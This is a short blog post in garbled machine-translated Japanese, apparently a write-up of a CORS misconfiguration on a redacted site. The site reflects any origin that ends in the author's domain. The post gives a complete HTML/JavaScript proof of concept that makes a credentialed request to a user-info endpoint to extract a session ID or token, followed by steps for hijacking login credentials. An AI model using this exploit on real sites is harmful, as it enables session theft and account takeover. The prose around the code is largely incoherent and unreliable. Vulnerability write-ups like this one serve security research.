RCOIL:の脆弱性
プロセスを掘り進むことは誤ってパケットを見て、応答パケットは、このフィールドにアクセス制御 - 許可 - 起源含まれ、その後、CORSの抜け穴が容易にあるかどうかを確認してみてください!結果が示されています
次に、以下の図を見つけよう!
私は戻ってプラスドメイン名がリソースへのクロスドメインアクセスすることができました
どのように使用するには?
パンが解決される使用は、http:比較的貧しい缶余裕がないドメイン名に対する当社のIPへの//m.****.com.rcoil.me決意は、彼らが次のように、パン・分析までローカルDNSセットを取りますマップ
限り.rcoil.meが地元にこれを解決します*として
POCは次の通り:
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "http://m.***.com/activity/juejiapi/editor/userinfo", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
TOKENは、前述したように、それをやって入手することができます
概要:
最初のステップ、CORSを制御可能にすることが可能かどうかを確認
するステップ2を制御すれば、その後の唯一のアカウントのログイン資格情報を探して、
その後、ハイジャックの資格情報かどうかを観察し、ステップ3